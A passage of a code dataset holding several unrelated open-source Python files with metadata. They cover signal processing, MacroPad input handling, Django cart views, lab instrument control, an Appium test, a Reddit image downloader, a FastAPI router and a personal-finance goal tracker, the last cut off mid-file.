phi=_phi):\n \"\"\"Return the detrended component (i.e., smooth component being subtracted) of the median-wavelet transfrom.\"\"\"\n return a - median_wavelet_smooth(a, level, scale, tau, phi)\n\n\ndef multiscale_median_flag(a, level=None, scale=2, tau=5.0, return_mask=True):\n\n if level == None:\n level = int(np.ceil(np.log2(np.min(a.shape))))\n\n if return_mask:\n mask = np.zeros_like(a, dtype=bool)\n\n if level <= 0:\n if return_mask:\n return a, mask\n else:\n return a\n\n for li in xrange(level):\n if li > 0:\n scale *= 2\n approx = median_filter(a, 2*scale+1)\n w = a - approx\n th = tau * MAD(w)\n # th = tau * MAD(w[w!=0])\n inds = np.where(np.abs(w) > th)[0]\n if return_mask:\n mask[inds] = True\n w[inds] = np.sign(w[inds]) * th\n a = approx + w\n\n if return_mask:\n return a, mask\n else:\n return a\n","repo_name":"TianlaiProject/tlpipe","sub_path":"tlpipe/utils/multiscale.py","file_name":"multiscale.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"68"} +{"seq_id":"74284976855","text":"from adafruit_macropad import MacroPad\nfrom collections import namedtuple\n\ntry:\n from typing import Iterable, Union\nexcept ImportError:\n pass\n\n# Event indicating the Encoder Button was pressed or released.\nEncoderButtonEvent = namedtuple(\"EncoderButtonEvent\", (\"pressed\",))\n\n# Event indicating the Encoder was rotated.\nEncoderEvent = namedtuple(\"EncoderEvent\", (\"position\", \"previous_position\"))\n\n# Event indicating a key was pressed or released.\nKeyEvent = namedtuple(\"KeyEvent\", (\"number\", \"pressed\"))\n\nclass Pad:\n\n # Initialize the Pad class (includes init of MacroPad, pixels, and encoder)\n def __init__(self):\n self.macropad = self._init_macropad()\n self.pixels = self.macropad.pixels\n\n self._last_encoder_position = self.encoder_position\n self._last_encoder_switch = self.encoder_switch\n\n # Initialize the MacroPad\n @classmethod\n def _init_macropad(cls, rotation: int = 0, midi_in_channel: int = 1, midi_out_channel: int = 1) -> MacroPad:\n \"\"\"Initialize the macropad.\n \n Args:\n rotation (int, optional): The rotation of the MacroPad. Defaults to 0.\n midi_in_channel (int, optional): The MIDI in channel. Defaults to 1.\n midi_out_channel (int, optional): The MIDI out channel. Defaults to 1.\n\n Returns:\n MacroPad: The initialized MacroPad.\n \"\"\"\n\n macropad = MacroPad(rotation, midi_in_channel, midi_out_channel)\n macropad.display.auto_refresh = False\n macropad.pixels.auto_write = False\n\n return macropad\n\n @property\n def encoder_position(self) -> int:\n \"\"\"Return the position of the encoder.\"\"\"\n\n return self.macropad.encoder\n\n @property\n def encoder_switch(self) -> bool:\n \"\"\"Return the state of the encoder switch.\"\"\"\n\n self.macropad.encoder_switch_debounced.update()\n return self.macropad.encoder_switch_debounced.pressed\n\n def event_stream(self) -> Iterable[Union[EncoderButtonEvent, EncoderEvent, KeyEvent]]:\n while True:\n yield from self.check_events()\n\n def check_events(self) -> Iterable[Union[EncoderButtonEvent, EncoderEvent, KeyEvent]]:\n \"\"\"Check for changes in state and return a tuple of events.\n\n Also execute any timers that are scheduled to run.\n\n Returns:\n Tuple[Union[EncoderButtonEvent, EncoderEvent, KeyEvent], ...]:\n A tuple of Events.\n \"\"\"\n \n position = self.encoder_position\n if position != self._last_encoder_position:\n last_encoder_position = self._last_encoder_position\n self._last_encoder_position = position\n yield EncoderEvent(position=position, previous_position=last_encoder_position)\n\n encoder_switch = self.encoder_switch\n if encoder_switch != self._last_encoder_switch:\n yield EncoderButtonEvent(pressed=encoder_switch)\n\n key_event = self.macropad.keys.events.get()\n if key_event:\n yield KeyEvent(number=key_event.key_number, pressed=key_event.pressed)\n\n yield from self.execute_ready_timers()","repo_name":"CS-5/macropad","sub_path":"pad.py","file_name":"pad.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37893485765","text":"from sitio.models import Producto, Categoria\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom .models import Carrito\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required, permission_required\n\n# Create your views here.\n@login_required\ndef carrito(request): \n carrito=Carrito(request)\n return render(request, 'carrito/carrito.html', {\n \"lista_categorias\": Categoria.objects.all()\n })\n\ndef agregar(request, producto_id):\n carrito=Carrito(request)\n producto = get_object_or_404(Producto, id=producto_id)\n carrito.agregar(producto=producto)\n return redirect('carrito:carrito')\n\ndef quitar(request, producto_id):\n carrito=Carrito(request)\n producto=Producto.objects.get(id=producto_id)\n carrito.quitar(producto=producto)\n return redirect('carrito:carrito')\n\ndef eliminar(request, producto_id):\n carrito=Carrito(request)\n producto=Producto.objects.get(id=producto_id)\n carrito.eliminar(producto=producto)\n return redirect('carrito:carrito')\n\ndef limpiar(request):\n carrito=Carrito(request)\n carrito.limpiar()\n return redirect('sitio:index')","repo_name":"aalabarces/TP-final","sub_path":"carrito/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42881178729","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport visa\nimport Connection\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass connection_setup:\n def __init__(self):\n self.rm = visa.ResourceManager()\n self.cmpl_current = 0.002 # default value 0.002A\n self.cmpl_voltage = 2.0 # default value is 2V\n self.query_time = 0.2 # default query time is 0.2 sec \n self.keithley = None\n self.pixelswitch = None\n self.shutter = None\n \n def keithley_cmpl_current(self,cmpl_current):\n self.cmpl_current = cmpl_current\n \n def keithley_query_time(self,query_time):\n self.query_time = query_time\n \n def keithley_cmpl_voltage(self,cmpl_voltage):\n self.cmpl_voltage = cmpl_voltage\n\n def cnnct_keithley(self,gpib_name):\n keithley = Connection.keithley()\n keithley._init_(self.rm)\n keithley.open_gpib(gpib_name)\n self.keithley = keithley\n\n def cnnct_pixelswitch(self,arduino_name):\n pixelswitch = Connection.pixelswitch()\n pixelswitch._init_(self.rm)\n pixelswitch.open_pixelswitcher_connection(arduino_name)\n self.pixelswitch = pixelswitch\n \n def cnnct_shutter(self,shutter_name):\n shutter = Connection.shutter()\n shutter._init_(self.rm)\n shutter.open_shutter_connection(shutter_name)\n self.shutter = shutter\n \n def connect(self,gpib_name=None, pixel_com_name=None, shutter_com_name=None):\n if gpib_name is not None:\n self.cnnct_keithley(gpib_name)\n if pixel_com_name is not None:\n self.cnnct_pixelswitch(pixel_com_name)\n if shutter_com_name is not None:\n self.cnnct_shutter(shutter_com_name)\n \n\n def get_voc(self):\n self.keithley.voltage_sensing(self.cmpl_voltage,self.query_time)\n self.keithley.inst_output_on()\n self.shutter.shutter_open()\n data = np.array(self.keithley.get_inst().read().split(','),dtype='float')\n voc = data[0]\n self.keithley.inst_output_off()\n self.shutter.shutter_close()\n print(data)\n print('Voc is %f V'%voc)\n return voc\n\n def get_isc(self):\n self.keithley.current_sensing(self.cmpl_current,self.query_time)\n self.keithley.inst_output_on()\n self.shutter.shutter_open()\n self.keithley.inst_set_source_volt_value(0)\n data = np.array(self.keithley.get_inst().read().split(','),dtype='float')\n isc = data[1]\n self.keithley.inst_output_off()\n self.shutter.shutter_close()\n print(data)\n print('Isc is %f A'%isc)\n return isc\n\n def voltage_sweep(self,volt_arr):\n data = np.empty((volt_arr.size,3))\n self.keithley.current_sensing(self.cmpl_current,self.query_time)\n self.keithley.inst_output_on()\n for index,_v in enumerate(volt_arr):\n self.keithley.inst_set_source_volt_value(_v)\n output = np.array(self.keithley.get_inst().read().split(','),dtype='float')\n data[index,:] = np.array(output[:])\n self.keithley.inst_output_off()\n return data\n\n def spo(vapp,time_length,time_interval,fid):\n start_time = time.time()\n self.keithley.current_sensing(self.cmpl_current,self.query_time)\n self.keithley.inst_output_on()\n self.keithley.inst_set_source_volt_value(vapp)\n while (time.time() - start_time) < time_length:\n output = np.array(self.keithley.get_inst().read().split(','),dtype='float')\n fid.write(output)\n time.sleep(time_interval)\n self.keithley.inst_output_off()\n\n\n\n\n","repo_name":"grace227/JvQt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38346497905","text":"from time import sleep\n\nfrom appium import webdriver\nfrom appium.webdriver.common.touch_action import TouchAction\n\n\nclass TestTouchAction():\n def setup(self):\n desired_caps = {}\n desired_caps['platformName'] = 'Android'\n desired_caps['platformVersion'] = '6.0'\n desired_caps['deviceName'] = 'emulator-5554'\n desired_caps['appPackage'] = 'cn.kmob.screenfingermovelock'\n desired_caps['appActivity'] = 'com.samsung.ui.MainActivity'\n desired_caps['noReset'] = True\n # desired_caps['dontStopAppOnReset'] = True 设置为true代表不重新启动一个app,直接在原来的app页面上操作,但是加了这个好像有问题,提示无法启动雪球app\n desired_caps['skipDeviceInitialization'] = True\n desired_caps['unicodeKeyBoard'] = 'true' # 输入中文搜索词的时候需要加这个,但是貌似不加也不会有问题\n desired_caps['resetKeyBoard'] = 'true'\n self.driver = webdriver.Remote(\"http://localhost:4723/wd/hub\", desired_caps)\n self.driver.implicitly_wait(5)\n\n def teardown(self):\n sleep(3)\n self.driver.quit()\n\n #\n def test_touchaction_unlock(self):\n action = TouchAction(self.driver)\n action.press(x=120,y=172).wait(200).move_to(x=364,y=179).wait(200).move_to(x=599,y=174).wait(200)\\\n .move_to(x=599,y=417).wait(200).move_to(x=601,y=654).release().perform()","repo_name":"mengMia/Hogwarts","sub_path":"PythonCode/App9/test_app6_2.py","file_name":"test_app6_2.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10083407530","text":"import requests\nimport os\nfrom os import path\nimport bs4\n\n\n# the url and file path are currently just for testing this works, will be changed next\ndef download_image(url, subreddit, title, count):\n # get extension from url (gif,mp4,jpg) and turn imgur and gfycat gifs into the proper format\n url, file_extension = url_handler(url)\n\n # set directory for images to be saved, desktop location is temporary\n file_path = path.join('C:\\\\Users\\\\Peter\\\\Desktop\\\\', subreddit)\n\n # creates file path using subreddit, if it doesn't already exist\n try:\n os.makedirs(file_path)\n except FileExistsError:\n pass\n\n # go to url and save the file to the file path\n response = requests.get(url)\n try:\n # if there is an invalid response code then an exception is raised (ex: 404 code)\n response.raise_for_status()\n # save file, title of the file is top post order, title is saved in a file below\n with open(file_path + \"\\\\\" + str(count) + \".\" + file_extension, 'wb') as f:\n f.write(response.content)\n print(\"Successful download!\")\n # saves the title of the post for uploading on imgur\n with open(file_path + \"\\\\titles.txt\", 'a') as f:\n f.write(title + \"\\n\")\n\n except requests.exceptions.HTTPError as e:\n print(str(e))\n except FileNotFoundError:\n print(\"Directory does not exist\")\n\n\ndef url_handler(url):\n # splits url to get file extension\n file_extension = \"\"\n url = fetch_image_url(url)\n\n # sets file extension to whatever is after the last '.' (so blahblah.com/blah.jpg the .jpg part)\n try:\n url_split = url.split('.')\n file_extension = url_split[-1]\n\n except UnboundLocalError:\n print(\"Unsupported url: \" + url)\n\n return url, file_extension\n\n\ndef fetch_image_url(url):\n # technically gifv and mp4 aren't supported now. But this function might be completely reworked later, so it stays\n supported_formats = (\".gif\", \".gifv\", \".png\", \".jpg\", \".mp4\")\n\n # checks if the url is to the source image or not, if not it finds the source image\n if not url.endswith(supported_formats):\n response = requests.get(url).content\n soup = bs4.BeautifulSoup(response, \"html.parser\")\n url_split_slash = url.split('/')\n\n # loops through all image sources in HTML and sets the correct image url\n images = soup.findAll('img')\n for image in images:\n # imgur links in the HTML are missing the http: so don't remove this\n if \"imgur\" in image['src']:\n url = \"http:\" + image['src']\n # this statement looks for matching urls endings between the source and container url\n # ex) The container url: 'http://www.livememe.com/apbp6e9'. The ending: 'apbp6e9'\n elif url_split_slash[-1] in image['src']:\n url = image['src']\n else:\n continue\n return url\n","repo_name":"PeterMorrison1/RedditBot","sub_path":"imagehandler.py","file_name":"imagehandler.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2436380505","text":"from fastapi import Depends, APIRouter, status\n\nfrom .services import SrvLeadership\nfrom api.schemas import Leadership, LeaderChange\nfrom api.specification import SessionID\n\nrouter = APIRouter(prefix='/leadership', tags=['leadership'])\n\n\n@router.post('', response_model=Leadership, status_code=status.HTTP_201_CREATED)\nasync def leadership(\n leadership: Leadership | LeaderChange,\n service: SrvLeadership = Depends()\n):\n return await service.post(leadership)\n\n\n@router.get('/{session_id}', response_model=Leadership)\nasync def session_leader(\n session_id: SessionID = Depends(),\n service: SrvLeadership = Depends()\n):\n return await service.get(session_id)\n\n\n@router.get('/hist/{session_id}', response_model=list[Leadership])\nasync def leadership(\n session_id: SessionID = Depends(),\n service: SrvLeadership = Depends()\n):\n return await service.history(session_id)\n","repo_name":"Ramzes377/Thrower","sub_path":"api/leadership/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35733353897","text":"from ppf.models import Ppf, PpfEntry\nfrom ssy.models import Ssy, SsyEntry\nfrom fixed_deposit.models import FixedDeposit\nfrom fixed_deposit.fixed_deposit_helper import get_maturity_value\nfrom espp.models import Espp, EsppSellTransactions\nfrom rsu.models import RSUAward, RestrictedStockUnits, RSUSellTransactions\nfrom epf.models import Epf, EpfEntry\nfrom goal.models import Goal\nfrom shares.models import Share, Transactions\nfrom users.models import User\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nfrom common.models import HistoricalStockPrice, Stock, MutualFund\nfrom shared.handle_real_time_data import get_conversion_rate, get_historical_stock_price, get_historical_mf_nav, get_historical_stock_price_based_on_symbol, get_in_preferred_currency\nfrom shared.handle_create import add_common_stock\nfrom mutualfunds.models import Folio, MutualFundTransaction\nfrom shared.financial import xirr\nfrom retirement_401k.helper import get_401k_amount_for_goal, get_r401k_value_as_on\nfrom shared.utils import get_min\nfrom epf.epf_interface import EpfInterface\nfrom espp.espp_interface import EsppInterface\nfrom fixed_deposit.fd_interface import FdInterface\nfrom ppf.ppf_interface import PpfInterface\nfrom ssy.ssy_interface import SsyInterface\nfrom shares.share_interface import ShareInterface\nfrom mutualfunds.mf_interface import MfInterface\nfrom retirement_401k.r401k_interface import R401KInterface\nfrom rsu.rsu_interface import RsuInterface\nfrom insurance.insurance_interface import InsuranceInterface\nfrom gold.gold_interface import GoldInterface\nfrom bankaccounts.bank_account_interface import BankAccountInterface\nfrom crypto.crypto_interface import CryptoInterface\nfrom shared.handle_get import get_goal_name_from_id\n\n\ndef get_ppf_amount_for_goal(id):\n ppf_objs = Ppf.objects.filter(goal=id)\n total_ppf = 0\n for ppf_obj in ppf_objs:\n ppf_num = ppf_obj.number\n amt = 0\n ppf_trans = PpfEntry.objects.filter(number=ppf_num)\n for entry in ppf_trans:\n if entry.entry_type.lower() == 'cr' or entry.entry_type.lower() == 'credit':\n amt += entry.amount\n else:\n amt -= entry.amount\n if amt < 0:\n amt = 0\n total_ppf += amt\n return total_ppf\n\ndef get_ssy_amount_for_goal(id):\n ssy_objs = Ssy.objects.filter(goal=id)\n total_ssy = 0\n for ssy_obj in ssy_objs:\n ssy_num = ssy_obj.number\n amt = 0\n ssy_trans = SsyEntry.objects.filter(number=ssy_num)\n for entry in ssy_trans:\n if entry.entry_type.lower() == 'cr' or entry.entry_type.lower() == 'credit':\n amt += entry.amount\n else:\n amt -= entry.amount\n if amt < 0:\n amt = 0\n total_ssy += amt\n return total_ssy\n\ndef get_fd_amount_for_goal(id):\n fd_objs = FixedDeposit.objects.filter(goal=id)\n total_fd = 0\n for fd_obj in fd_objs:\n total_fd += fd_obj.final_val\n return total_fd\n\ndef get_espp_amount_for_goal(id):\n espp_objs = Espp.objects.filter(goal=id)\n total_espp = 0\n for espp_obj in espp_objs:\n if espp_obj.latest_value:\n total_espp += espp_obj.latest_value\n return total_espp\n\ndef get_rsu_amount_for_goal(id):\n award_objs = RSUAward.objects.filter(goal=id)\n total_rsu = 0\n for award_obj in award_objs:\n for rsu_obj in RestrictedStockUnits.objects.filter(award=award_obj):\n if rsu_obj.latest_value:\n total_rsu += rsu_obj.latest_value\n return total_rsu\n\ndef get_shares_amount_for_goal(id):\n share_objs = Share.objects.filter(goal=id)\n total_shares = 0\n for share_obj in share_objs:\n if share_obj.latest_value:\n total_shares += share_obj.latest_value\n return total_shares\n\ndef get_mf_amount_for_goal(id):\n folio_objs = Folio.objects.filter(goal=id)\n total = 0\n for folio_obj in folio_objs:\n if folio_obj.latest_value:\n total += folio_obj.latest_value\n return total\n\ndef get_epf_amount_for_goal(id):\n epf_objs = Epf.objects.filter(goal=id)\n total_epf = 0\n for epf_obj in epf_objs:\n epf_id = epf_obj.id\n amt = 0\n epf_trans = EpfEntry.objects.filter(epf_id=epf_id)\n for entry in epf_trans:\n amt += entry.employee_contribution + entry.employer_contribution + entry.interest_contribution\n amt -= entry.withdrawl\n if amt < 0:\n amt = 0\n total_epf += amt\n return total_epf\n\ndef get_goal_contributions(goal_id):\n goal_name = get_goal_name_from_id(goal_id)\n print(f\"inside get_goal_contributions {goal_id} {goal_name}\")\n contrib = dict()\n contrib['epf'] = int(get_epf_amount_for_goal(goal_id))\n contrib['espp'] = int(get_espp_amount_for_goal(goal_id))\n contrib['fd'] = int(get_fd_amount_for_goal(goal_id))\n contrib['ppf'] =int(get_ppf_amount_for_goal(goal_id))\n contrib['ssy'] =int(get_ssy_amount_for_goal(goal_id))\n contrib['rsu'] =int(get_rsu_amount_for_goal(goal_id))\n contrib['shares'] = int(get_shares_amount_for_goal(goal_id))\n contrib['mf'] = int(get_mf_amount_for_goal(goal_id))\n \n contrib['equity'] = contrib['espp']+contrib['rsu']+contrib['shares']+contrib['mf']\n contrib['debt'] = contrib['epf'] + contrib['fd'] + contrib['ppf'] + contrib['ssy']\n contrib['distrib_labels'] = ['EPF','ESPP','FD','PPF','SSY','RSU','Shares','MutualFunds']\n contrib['distrib_vals'] = [contrib['epf'],contrib['espp'],contrib['fd'],contrib['ppf'],contrib['ssy'],contrib['rsu'],contrib['shares'],contrib['mf']]\n contrib['distrib_colors'] = ['#f15664', '#DC7633','#006f75','#92993c','#f9c5c6','#AA12E8','#e31219','#bfff00']\n\n contrib['401k'] = int(get_401k_amount_for_goal(goal_id))\n if contrib['401k'] > 0:\n contrib['distrib_labels'].append('401K')\n contrib['distrib_vals'].append(contrib['401k'])\n contrib['distrib_colors'].append('#617688')\n contrib['equity'] += contrib['401k']\n\n contrib['insurance'] = int(InsuranceInterface.get_amount_for_goal(goal_id))\n if contrib['insurance'] > 0:\n contrib['distrib_labels'].append('Insurance')\n contrib['distrib_vals'].append(contrib['insurance'])\n contrib['distrib_colors'].append('#ede76d')\n contrib['equity'] += contrib['insurance']\n\n contrib['gold'] = int(GoldInterface.get_amount_for_goal(goal_id))\n if contrib['gold'] > 0:\n contrib['distrib_labels'].append('Gold')\n contrib['distrib_vals'].append(contrib['gold'])\n contrib['distrib_colors'].append('#ffd700')\n \n contrib['cash'] = int(BankAccountInterface.get_amount_for_goal(goal_id))\n if contrib['cash'] > 0:\n contrib['distrib_labels'].append('Cash')\n contrib['distrib_vals'].append(contrib['cash'])\n contrib['distrib_colors'].append(BankAccountInterface.get_chart_color())\n \n contrib['crypto'] = int(CryptoInterface.get_amount_for_goal(goal_id))\n if contrib['crypto'] > 0:\n contrib['distrib_labels'].append('Crypto')\n contrib['distrib_vals'].append(contrib['crypto'])\n contrib['distrib_colors'].append(CryptoInterface.get_chart_color())\n\n contrib['total'] = contrib['equity'] + contrib['debt'] + contrib['gold'] + contrib['cash']\n\n print(\"contrib:\", contrib)\n return contrib\n\n#port: portfolioval\n#contrib: contribution \n#deduct: deduction\ndef add_or_create(year, key, contrib_obj, deduct_obj, port_obj, contrib, deduct, port):\n if year not in contrib_obj:\n contrib_obj[year] = dict()\n port_obj[year] = dict()\n deduct_obj[year] = dict()\n if contrib:\n contrib_obj[year][key] = float(contrib) + contrib_obj[year].get(key, 0)\n if port:\n port_obj[year][key] = float(port) + port_obj[year].get(key, 0)\n if deduct: \n deduct_obj[year][key] = float(deduct) + deduct_obj[year].get(key, 0)\n\n\ndef get_goal_yearly_contrib_v2(goal_id, expected_return, format='%Y-%m-%d'):\n start_day = datetime.date.today()\n start_day = get_min(EpfInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(EsppInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(FdInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(MfInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(PpfInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(SsyInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(ShareInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(R401KInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(RsuInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(InsuranceInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(GoldInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(BankAccountInterface.get_start_day_for_goal(goal_id), start_day)\n start_day = get_min(CryptoInterface.get_start_day_for_goal(goal_id), start_day)\n \n contrib = dict()\n total = dict()\n deduct = dict()\n cash_flows = list()\n latest_value = 0\n total_contrib = 0\n # Deduction is a -ve number\n total_deduct = 0\n\n curr_yr = datetime.date.today().year\n print_all = False\n\n for yr in range(start_day.year, curr_yr+1):\n print(f'*** {yr} ***')\n cf, c, d, t = PpfInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'PPF', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Ppf {t} latest_value is {latest_value}')\n\n\n cf, c, d, t = EpfInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'EPF', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Epf {t} latest_value is {latest_value}')\n\n cf, c, d, t = SsyInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'SSY', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Ssy {t} latest_value is {latest_value}')\n\n cf, c, d, t = MfInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'MutualFunds', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Mf {t} latest_value is {latest_value}')\n\n cf, c, d, t = EsppInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'ESPP', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Espp {t} latest_value is {latest_value}')\n\n cf, c, d, t = FdInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'FD', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding FD {t} latest_value is {latest_value}')\n\n cf, c, d, t = ShareInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'Shares', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding shares {t} latest_value is {latest_value}')\n \n cf, c, d, t = RsuInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'RSU', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding RSU {t} latest_value is {latest_value}')\n \n cf, c, d, t = InsuranceInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'Insurance', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding Insurance {t} latest_value is {latest_value}')\n\n cf, c, d, t = R401KInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, '401K', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding 401K {t} latest_value is {latest_value}')\n\n cf, c, d, t = GoldInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'Gold', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding gold {t} latest_value is {latest_value}')\n\n cf, c, d, t = BankAccountInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'Cash', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding cash {t} latest_value is {latest_value}')\n \n cf, c, d, t = CryptoInterface.get_goal_yearly_contrib(goal_id, yr)\n if len(cf) > 0 or c+d+t != 0:\n add_or_create(yr, 'Crypto', contrib, deduct, total, c, d, t)\n cash_flows.extend(cf)\n latest_value += float(t) if yr == curr_yr else 0\n total_contrib += float(c)\n total_deduct += float(d)\n if print_all or yr == curr_yr:\n print(f'after adding crypto {t} latest_value is {latest_value}')\n\n if yr not in contrib:\n contrib[yr] = dict()\n if yr not in deduct:\n deduct[yr] = dict()\n if yr not in total:\n total[yr] = dict()\n\n print(f'total_contrib {total_contrib} total_deduct {total_deduct} latest_value {latest_value}')\n if len(cash_flows) > 0 and latest_value != 0:\n cash_flows.append((datetime.date.today(), latest_value))\n cash_flows = sort_set(cash_flows)\n return contrib, deduct, total, latest_value, cash_flows\n\n\ndef get_goal_yearly_contrib(goal_id, expected_return, format='%Y-%m-%d'):\n if expected_return:\n expected_return = int(expected_return)\n print(f\"inside get_goal_yearly_contrib {goal_id} {expected_return}\")\n\n ret = dict()\n curr_yr = datetime.datetime.now().year\n\n '''\n contrib = dict()\n total = dict()\n deduct = dict()\n cash_flows = list()\n for ppf_obj in Ppf.objects.filter(goal=goal_id):\n for ppf_trans in PpfEntry.objects.filter(number=ppf_obj):\n #entry_date = (datetime.date(ppf_trans.year + (ppf_trans.month == 12), \n # (ppf_trans.month + 1 if ppf_trans.month < 12 else 1), 1) - datetime.timedelta(1)).strftime(format)\n if ppf_trans.interest_component:\n if ppf_trans.entry_type == 'CR':\n add_or_create(ppf_trans.trans_date.year, 'PPF', contrib, deduct, total, 0, 0, ppf_trans.amount)\n else:\n add_or_create(ppf_trans.trans_date.year, 'PPF', contrib, deduct, total, 0, 0, -1*ppf_trans.amount)\n cash_flows.append((ppf_trans.trans_date, float(ppf_trans.amount)))\n else:\n if ppf_trans.entry_type == 'CR':\n add_or_create(ppf_trans.trans_date.year, 'PPF', contrib, deduct, total, ppf_trans.amount, 0, ppf_trans.amount)\n cash_flows.append((ppf_trans.trans_date, -1*float(ppf_trans.amount)))\n else:\n add_or_create(ppf_trans.trans_date.year, 'PPF', contrib, deduct, total, 0, -1*ppf_trans.amount, -1*ppf_trans.amount)\n cash_flows.append((ppf_trans.trans_date, float(ppf_trans.amount)))\n \n for epf_obj in Epf.objects.filter(goal=goal_id):\n for epf_trans in EpfEntry.objects.filter(epf_id=epf_obj):\n #entry_date = (datetime.date(epf_trans.year + (epf_trans.month == 12), \n # (epf_trans.month + 1 if epf_trans.month < 12 else 1), 1) - datetime.timedelta(1)).strftime(format)\n add_or_create(epf_trans.trans_date.year, 'EPF', contrib, deduct, total, epf_trans.employer_contribution + epf_trans.employee_contribution, epf_trans.withdrawl, epf_trans.employer_contribution + epf_trans.employee_contribution+ epf_trans.interest_contribution-epf_trans.withdrawl)\n cash_flows.append((epf_trans.trans_date, -1*float(epf_trans.employer_contribution+ epf_trans.employee_contribution)))\n if epf_trans.withdrawl and epf_trans.withdrawl > 0:\n cash_flows.append((epf_trans.trans_date, float(epf_trans.withdrawl)))\n\n for ssy_obj in Ssy.objects.filter(goal=goal_id):\n for ssy_trans in SsyEntry.objects.filter(number=ssy_obj):\n if ssy_trans.interest_component:\n if ssy_trans.entry_type == 'CR':\n 